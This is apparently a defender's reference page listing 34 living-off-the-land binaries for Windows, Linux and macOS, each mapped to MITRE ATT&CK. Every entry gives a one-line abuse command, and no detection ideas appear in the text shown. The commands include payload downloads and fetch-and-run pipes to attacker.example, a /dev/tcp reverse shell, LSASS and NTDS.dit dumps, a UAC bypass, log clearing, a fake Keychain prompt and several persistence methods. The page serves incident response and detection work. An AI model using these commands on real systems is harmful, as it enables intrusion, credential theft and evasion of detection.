mshta.exeLOLBASwindowsexecuteT1218.005source Run remote HTA / VBS / JS code
mshta.exe https://attacker.example/payload.hta
34 curated entries from LOLBAS (Windows), GTFOBins (Unix), and LOOBins (macOS), each mapped to MITRE ATT&CK with a one-line abuse example and a detection idea.
A subset of the full catalogues — pick the entries I reach for during phishing / BEC / commodity-malware IRs. Use the upstream sources (linked on each card) for the complete coverage.
Showing 34 of 34
mshta.exeLOLBASwindowsexecuteT1218.005source Run remote HTA / VBS / JS code
mshta.exe https://attacker.example/payload.hta
rundll32.exeLOLBASwindowsexecuteT1218.011source Run JavaScript via rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc.exe")regsvr32.exeLOLBASwindowsexecuteT1218.010source "Squiblydoo" — register remote scriptlet, run code
regsvr32 /s /u /n /i:https://attacker.example/file.sct scrobj.dll
MSBuild.exeLOLBASwindowsexecuteT1127.001source Inline-task / XML-payload build that compiles + runs C#
MSBuild.exe payload.csproj
InstallUtil.exeLOLBASwindowsexecuteT1218.004source Run .NET assembly via /U (uninstall) without admin
InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
wmic.exeLOLBASwindowslateral-movementT1047source Remote process creation via WMI
wmic /node:"target.example" process call create "cmd /c whoami > c:\out.txt"
certutil.exeLOLBASwindowsdownloadT1105source Download arbitrary file (legacy "url cache" trick)
certutil.exe -urlcache -split -f https://attacker.example/payload.exe payload.exe
bitsadmin.exeLOLBASwindowsdownloadT1197source Background-Intelligent-Transfer-Service download with auto-resume
bitsadmin /transfer job /priority high https://attacker.example/x.exe %TEMP%\x.exe
powershell.exeLOLBASwindowsexecuteT1059.001source Download + execute via IEX
powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://attacker.example/p.ps1')"cmstp.exeLOLBASwindowsexecuteT1218.003source Microsoft Connection Manager INF abuse
cmstp.exe /au /s c:\public\evil.inf
schtasks.exeLOLBASwindowspersistenceT1053.005source Create scheduled task at logon / on-boot
schtasks /Create /SC ONLOGON /TN updater /TR "powershell -nop -f c:\users\public\u.ps1" /RL HIGHEST
reg.exeLOLBASwindowspersistenceT1547.001source Add Run / RunOnce autostart
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "c:\users\public\u.exe" /f
sc.exeLOLBASwindowspersistenceT1543.003source Create / modify a service for persistence
sc create updater binPath= "cmd /c c:\users\public\u.exe" start= auto
ntdsutil.exeLOLBASwindowscredential-accessT1003.003source Dump NTDS.dit (domain hashes)
ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntds" q q
comsvcs.dllLOLBASwindowscredential-accessT1003.001source LSASS minidump via MiniDump export
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> c:\temp\lsass.dmp full
attrib.exeLOLBASwindowsdefense-evasionT1564.001source Hide file with system / hidden attribute
attrib +s +h c:\users\public\u.exe
fodhelper.exeLOLBASwindowspriv-escT1548.002source UAC bypass via auto-elevated registry hijack
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "c:\evil.exe" /f & fodhelper.exe
wevtutil.exeLOLBASwindowsdefense-evasionT1070.001source Clear event log
wevtutil cl Security
nltest.exeLOLBASwindowsdiscoveryT1482source Enumerate domain trusts and DCs
nltest /domain_trusts /all_trusts
whoami.exeLOLBASwindowsdiscoveryT1033source Show current user / privileges / groups
whoami /all
curlGTFOBinslinuxmacosdownloadT1105source File download (and read SUID files when curl has caps)
curl https://attacker.example/p.sh -o /tmp/p.sh && bash /tmp/p.sh
wgetGTFOBinslinuxdownloadT1105source Download + execute
wget -qO- https://attacker.example/p.sh | bash
findGTFOBinslinuxmacosexecuteT1059.004source Run arbitrary command via -exec
find . -exec /bin/sh \; -quit
awkGTFOBinslinuxmacosexecuteT1059.004source Spawn shell from awk system()
awk 'BEGIN {system("/bin/sh")}'python3GTFOBinslinuxmacosexecuteT1059.006source pty.spawn shell upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'bashGTFOBinslinuxmacosexecuteT1059.004source Reverse TCP shell via /dev/tcp
bash -i >& /dev/tcp/attacker.example/4444 0>&1
sudoeditGTFOBinslinuxpriv-escT1548.003source CVE-2023-22809 — env var EDITOR / VISUAL hijack
EDITOR="vim -- /etc/shadow" sudoedit /etc/anything
crontabGTFOBinslinuxmacospersistenceT1053.003source User crontab persistence
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.x") | crontab -
sshGTFOBinslinuxmacoslateral-movementT1021.004source Lateral movement using stolen private keys
ssh -i ~/.ssh/id_rsa user@target.example "uname -a"
tarGTFOBinslinuxmacosexecuteT1059.004source Run command via --checkpoint-action
tar cf /tmp/x /tmp --checkpoint=1 --checkpoint-action=exec=/bin/sh
osascriptLOOBinsmacoscredential-accessT1056.002source Prompt user for password via fake Keychain dialog
osascript -e 'display dialog "Keychain wants to use the login keychain." default answer "" with hidden answer'
launchctlLOOBinsmacospersistenceT1543.001source Persistence via Launch Agent / Daemon
launchctl load -w ~/Library/LaunchAgents/com.attacker.sync.plist
securityLOOBinsmacoscredential-accessT1555.001source Dump Keychain entries from CLI
security find-generic-password -s "AccountName" -w
sudoLOOBinsmacospriv-escT1548.003source Cached sudo session abuse for silent escalation
sudo -l; sudo -E /usr/bin/whoami # within timeout window